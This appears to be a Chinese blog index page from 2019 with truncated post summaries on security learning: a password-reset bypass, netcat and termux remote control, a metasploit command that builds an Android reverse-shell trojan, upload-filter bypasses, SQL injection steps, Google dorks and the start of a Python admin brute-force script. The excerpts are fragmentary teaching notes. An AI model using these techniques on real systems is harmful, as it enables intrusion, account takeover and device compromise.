摘要: 要求登录admin账号 1.登录界面 我们发现有找回密码这个易受攻击点 2.直奔找回密码 通过观察前两个阶段url(reset1.htm1 reset2.html),我们推测出了第三个阶段的url(reset3.html) 第一阶段 第二阶段 第三阶段 先在重设密码第一阶段输入admin,然后更改u 阅读全文
posted @ 2019-11-07 11:19 WTa0 阅读(543) 评论(0) 推荐(0) 编辑
摘要: 无符号数,2的补码,原码 1. 无符号数 例如:四位无符号数 十进制:1 无符号数:0001 十进制: 2 无符号数:0010 2. 原码(有符号数) 最高位用于表示正负号,0表示正,1表示负。 所以,表示正数时原码与无符号数相同。 例如:四位数 十进制:1 原码:0001 十进制: 1 原码:10 阅读全文
posted @ 2019-11-07 11:18 WTa0 阅读(1441) 评论(0) 推荐(0) 编辑
摘要: 各种进制之间的转换 D表示十进制,B表示二进制,H表示十六进制。 1.十进制转二进制 例子: 45D 转为二进制 45/2=22·····余1 22/2=11·····余0 11/2=5 ·····余1 5/2=2 ·····余1 2/2=1·······余0 1/2=0·······余1 所以从下 阅读全文
posted @ 2019-11-07 11:17 WTa0 阅读(3383) 评论(0) 推荐(0) 编辑
摘要: 免root实现xshell连接termux termux为安卓手机上的一款模拟linux终端的应用,由于手机上打字比较麻烦,所以想到了用电脑上的xshell通过ssh连接termux,以实现电脑控制termux。 一.配置termux 1.申请读写权限,以创建storage文件夹。 进入shared 阅读全文
posted @ 2019-11-07 11:16 WTa0 阅读(840) 评论(0) 推荐(0) 编辑
摘要: 关于nc实现远程控制termux 1.首先termux安装namp 2.windows系统安装netcat "此为netcat下载连接" 下载得到zip压缩包,解压得到里面的exe文件 将exe文件放在c盘用户文件夹里面 最后打开windows命令行,输入nc相关的命令即可使用 3.如何建立连接 t 阅读全文
posted @ 2019-11-07 11:16 WTa0 阅读(954) 评论(0) 推荐(0) 编辑
摘要: metasploit 安卓木马入侵 (仅供学习使用,禁止非法使用) 1.生成木马程序 msfvenom p android/meterpreter/reverse_tcp LHOST=本机ip LPORT=本机端口 R 保存路径/文件名.apk 这里我们使用了反射型tcp,让目标主机连接我们,有时攻 阅读全文
posted @ 2019-11-07 11:15 WTa0 阅读(779) 评论(0) 推荐(0) 编辑
摘要: 1.常用普通功能 db_destory //删除数据库 nc ip port //获取基本系统信息 2.nexpose 连接数据库 load nexpose //载入nexpose插件 msf help msf nexpose_connect h //查看连接nexpose需要的参数 msf nex 阅读全文
posted @ 2019-11-07 11:14 WTa0 阅读(902) 评论(0) 推荐(0) 编辑
摘要: 1.msf连接数据库 service postgresql start(postgresql默认用户名scott,密码tiger) msf db_connect 用户名:密码@127.0.0.1/msfbook msf help msf db_status //状态是否连接 msf db_impor 阅读全文
posted @ 2019-11-07 11:14 WTa0 阅读(133) 评论(0) 推荐(0) 编辑
摘要: 1.前端检测绕过 【1】前端绕过,利用控制台同名函数覆盖文件检测函数 2.MIME检测绕过 【1】例如图片,则将brupsuite抓包修改Content Type,例如图片mime为image/jepg 3.apache漏洞 【1】若上传php木马,则可将文件名改为xxx.php.rar 因为apa 阅读全文
posted @ 2019-11-07 11:11 WTa0 阅读(129) 评论(0) 推荐(0) 编辑
摘要: 一 、字符型(需要闭合特意去 ' ' ) 【1】查当前库名 或 。。。。。。。。。。。。。。。。。。。。假设返回库名为security库 【2】查security库的表名 。。。。。。。。。。。。。。。。。。。。假设返回表名为users 【3】查security库users表的列名 。。。。。。。。 阅读全文
posted @ 2019-11-07 11:10 WTa0 阅读(183) 评论(0) 推荐(0) 编辑
摘要: 常用表达式 "xxx" 查找一个短语 AND + OR | NOT intext: intext:"xxx" ——文档中包含xxx短语 intitle: intitle:"xxx" ——标题中包含xxx短语 intitle:"xxx"空格"yyy"——标题中包含xxx,其他任意位置包含yyy短语 i 阅读全文
posted @ 2019-11-07 11:09 WTa0 阅读(361) 评论(0) 推荐(0) 编辑
摘要: 在proxy中 作为服务器在本地3334端口进行监听, 作为客户端连接远程web服务器192.158.1.111 80 在netcat中(我们只用到了客户端) 再在本地建立一个客户端,连接本地服务器,实现web服务器传来的流量流经本地3334端口。 我们浏览器访问127.0.0.1:3334, 显示 阅读全文
posted @ 2019-11-07 11:07 WTa0 阅读(558) 评论(0) 推荐(0) 编辑
摘要: 1.代理流程图 2.实现代码 阅读全文
posted @ 2019-11-07 11:06 WTa0 阅读(1138) 评论(0) 推荐(0) 编辑
摘要: client客户端: client_sender() 发送接受信息 server服务器: server_loop函数监听并调用新线程执行 client_handler()函数 client_handler()函数中 1.upload_destination client文件传输到server 2.c 阅读全文
posted @ 2019-11-07 11:04 WTa0 阅读(520) 评论(0) 推荐(0) 编辑
摘要: ```pythonimport urllib2import urllibimport cookielibimport threadingimport sysimport Queuefrom HTMLParser import HTMLParseruser_thread =10#这里登录名默认adminusername ="admin"#pass.txt中保存密码文本文件wo... 阅读全文
posted @ 2019-11-07 11:02 WTa0 阅读(360) 评论(0) 推荐(0) 编辑
摘要: python实现自动抓取某站点内所有超链接 (仅供学习使用) 代码部分 !/usr/bin/python import requests import time import re import sys, getopt 命令行选项 from bs4 import BeautifulSoup loca 阅读全文
posted @ 2019-11-07 10:52 WTa0 阅读(360) 评论(0) 推荐(0) 编辑